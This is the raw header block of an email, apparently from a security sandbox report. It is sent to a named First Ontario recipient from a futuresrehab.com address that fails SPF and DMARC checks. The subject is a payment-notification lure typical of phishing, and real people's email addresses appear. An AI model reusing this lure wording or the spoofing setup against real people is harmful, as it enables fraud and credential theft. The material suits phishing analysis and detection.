                                                                    Arc-Message-Signaturei=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=/yzUKFIYcWDGOcnbVSmH63gazhsClv9Ppwj4VJjSmXg=; b=P3e4r/GzABunDCvJBG/8Mb3fduSimi4+aLUWwYjjNs0NyKdZXXRdvpFg07WKVMBG6Q7HYrCXl8ryXf2ItIgVcwHJftx6ED6KMUTJ+2fczRh2o10o7oAyDKR7bRjLLZ3OpBUqSiLlA+vKjDEGox2OlQ3V200RqmSMm4+5/2qJp7dVjO0OFJC3ISUXtbJWF+VvMK+hytaj5VO/sMt22mK6mviKeyJuqvjK306vJ2zZDVuyOYcsYQ9aRkcupVLhi8ly2g+Ss48krEK0O4spCURFWO9J1754DbyxwlMEHwMamDNBU0FldT20+VxGLrpbDmsW72KBeL9GXlkag0LKcNgjlQ==
                                                                    Arc-Authentication-Resultsi=1; mx.microsoft.com 1; spf=fail (sender ip is 216.155.139.132) smtp.rcpttodomain=firstontario.com smtp.mailfrom=futuresrehab.com; dmarc=fail (p=none sp=none pct=100) action=none header.from=futuresrehab.com; dkim=none (message not signed); arc=none (0)
                                                                    Receivedfrom [127.0.0.1] (216.155.139.132) by CO1PEPF000042AA.mail.protection.outlook.com (10.167.243.39) with Microsoft SMTP Server (version=TLS1_3, cipher=TLS_AES_256_GCM_SHA384) id 15.20.8534.20 via Frontend Transport; Fri, 21 Mar 2025 22:17:25 +0000
                                                                    Authentication-Resultsspf=pass (sender IP is 2a01:111:f403:240a::71f) smtp.mailfrom=futuresrehab.com; dkim=pass (signature was verified) header.d=futuresrehab.com;dmarc=pass action=none header.from=futuresrehab.com;
                                                                    Received-SpfFail (protection.outlook.com: domain of futuresrehab.com does not designate 216.155.139.132 as permitted sender) receiver=protection.outlook.com; client-ip=216.155.139.132; helo=[127.0.0.1];
                                                                    Dkim-Signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=futuresrehab.com; s=selector1; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck; bh=/yzUKFIYcWDGOcnbVSmH63gazhsClv9Ppwj4VJjSmXg=; b=g7rjHEHYqCzAQNSFKyop3SDW94eij6i8us2aNePgBSF8Rn/FfvIUGHm15FL7JO/xVnxIDMzaKFO9vdYw5Everay0SYtoaCveh5vktVyKl6L1QvbljWAQJd/0/T+vjd3EPq3dQujJjf0ti0ugVgdAR85OgFvv60+iUOoXJg4zJFg=
                                                                    X-Ms-Exchange-Authentication-Resultsspf=fail (sender IP is 216.155.139.132) smtp.mailfrom=futuresrehab.com; dkim=none (message not signed) header.d=none;dmarc=fail action=none header.from=futuresrehab.com;
                                                                    Content-Typemultipart/mixed; boundary="----sinikael-?=_1-17425956447190.8779605575797027"
                                                                    Content-Transfer-Encoding7bit
                                                                    Content-Dispositionattachment
                                                                    Fromkbrecken@futuresrehab.com
                                                                    ToAnders Ireland <Anders.Ireland@firstontario.com>
                                                                    SubjectNew payment scheduled for firstontario.com will arrive your bank in 2-3 business days ref 3c6b1059512ad4105ee797a7b10ad005
                                                                    Message-Id<44ccc28e-d28a-f608-c4e8-29c335d70c39@futuresrehab.com>
                                                                    DateFri, 21 Mar 2025 22:17:23 +0000
                                                                    MIME-Version1.0
                                                                    Return-Pathkbrecken@futuresrehab.com
                                                                    X-Eopattributedmessage1
                                                                    X-Ms-Traffictypediagnostic CO1PEPF000042AA:EE_|SA1PR14MB6007:EE_|YT2PEPF000001CF:EE_|YT2PR01MB8678:EE_
                                                                    X-Ms-Office365-Filtering-Correlation-Id 9b662dbd-1ff1-437d-08b6-08dd68c62ab0
                                                                    X-Ms-Exchange-Senderadcheck1
                                                                    X-Ms-Exchange-Antispam-Relay0
                                                                    X-Microsoft-Antispam-Untrusted BCL:0;ARA:13230040|82310400026|1800799024|376014|36860700013|4053099003|3613699012;
                                                                    X-Microsoft-Antispam-Message-Info-Original xGum5oGcMXnhfYoiJ+97+VJdmJqq74+Egc5N4qTT/pKjTf77UfulOQz/+K75uQ/x/wP1OOx6GWH2PVBFE7dfHXBrDWierTIF6RDpZbmUTKfv8tYzEPHPLkwZP9LOHu6Xr3Nz3XMkvNT8et/ht19PHv4clTk6TaK7PTVexBBwWujGgy7vM0cZltcYbm4Px+1aSrbUtG+pmHcYy2Eod0chDzwKyeu3L3brKhIXe/WInjmo4SMs83Lr57WK+BxlS1TbbCTGl3//vZVpxc1T7oIsFqMkulbraXaTZfXW9tW5943NdfEJpjgD/Vl732CizkRz54ZNFgaW8KTMxdNFF3ywwijeW8ftXrtsg4+uicW726IxJI904gJSmowuhlQLdgVxfBO8ocRE1dKNPcKI2rdByiUDNlBw9gsJHOcMVFmMEXbgKmuKEBF133MN3emZRCXpwSoiKPa5Zeij2B3FDMCr4NsoVxA4+b2MeYp2uDG+li6RirqbSxW6VS8q/NhdwEwGkj63sjUBcewzo6BPkmYqvvBTPXnHBIJRVf2OLy6jIFTy5wnIussiciUP35/6bBLD2IDrX5/cPOoKQ8bq5oQM5Wqwxf6nAzrAfSUoMb7jj32qDv8qfl8WoIxTcOo0zJ2BFAVTSO2cJ5FY0rL6stEN/tApU5LfRZoU+uLVCOLwID1QBZY4iCpWvPPoOeGkncYDF1eGS62fl+jN9PXlV/L3rJzEX5n7Od0RacoDW/SZaMFOIyDbzk6HQDCCUP/zd07v+Q3jt8q76Z3PSuRJr8+kg5QfMCqEaAb43HfDt/Iz4snKWujVoghkxZe95CQzBh6SGOLpj7HT2nVRfJ9JeMxsLCL3aoN6aO2D5px7rbsFi8Fc2w92T9H2tLJtmPVSRSpxau70U387YZr0eMqZPLwzGDiAPWP+YZ+T41zupQGXsVVwVJusH2rAHn7am8zzU+BF463Umr1QRWhdzysK4Z73rqLh+qETEdSPinphO7a1xMTjQ2PIBeDYmBTbuo8Q3eFcDzwkmUAS7owNfw6DTduvqPxcbLKwnD4GRiMtlibaRay8tsgovtDTJF1TEbupeWWBuX7rxNWDgFH8L9dfc7Z/uQuPKEsGTtpsERHGlatHd5robtWVHbXIaRyE4GauRXAx0hki1xmd6R7S6kZZEohllyUv8UNBqEpTGtLzr8/r9ps=
                                                                    X-Forefront-Antispam-Report-Untrusted CIP:216.155.139.132;CTRY:US;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:[127.0.0.1];PTR:216-155-139-132.choopa.net;CAT:NONE;SFS:(13230040)(82310400026)(1800799024)(376014)(36860700013)(4053099003)(3613699012);DIR:OUT;SFP:1102;
                                                                    X-Ms-Exchange-Transport-CrosstenantheadersstampedSA1PR14MB6007
                                                                    X-Ms-Exchange-Organization-Expirationstarttime21 Mar 2025 22:17:28.5471 (UTC)
                                                                    X-Ms-Exchange-Organization-ExpirationstarttimereasonOriginalSubmit
                                                                    X-Ms-Exchange-Organization-Expirationinterval1:00:00:00.0000000
                                                                    X-Ms-Exchange-Organization-ExpirationintervalreasonOriginalSubmit
                                                                    X-Ms-Exchange-Organization-Network-Message-Id 9b662dbd-1ff1-437d-08b6-08dd68c62ab0
                                                                    X-Eoptenantattributedmessage704f30be-15a6-482a-b249-cfe161841910:0
                                                                    X-Ms-Exchange-Organization-MessagedirectionalityIncoming
                                                                    X-Ms-Exchange-Transport-Crosstenantheadersstripped YT2PEPF000001CF.CANPRD01.PROD.OUTLOOK.COM
                                                                    X-Ms-Exchange-Transport-Crosstenantheaderspromoted YT2PEPF000001CF.CANPRD01.PROD.OUTLOOK.COM
                                                                    X-Ms-PublictraffictypeEmail
                                                                    X-Ms-Exchange-Organization-Authsource YT2PEPF000001CF.CANPRD01.PROD.OUTLOOK.COM
                                                                    X-Ms-Exchange-Organization-AuthasAnonymous
                                                                    X-Ms-Office365-Filtering-Correlation-Id-Prvs a6f590c3-dd8c-4ecb-63ac-08dd68c62947
                                                                    X-Ms-Exchange-AtpmessagepropertiesSA|SL

                                                                    Icon Hash:46070c0a8e0c67d6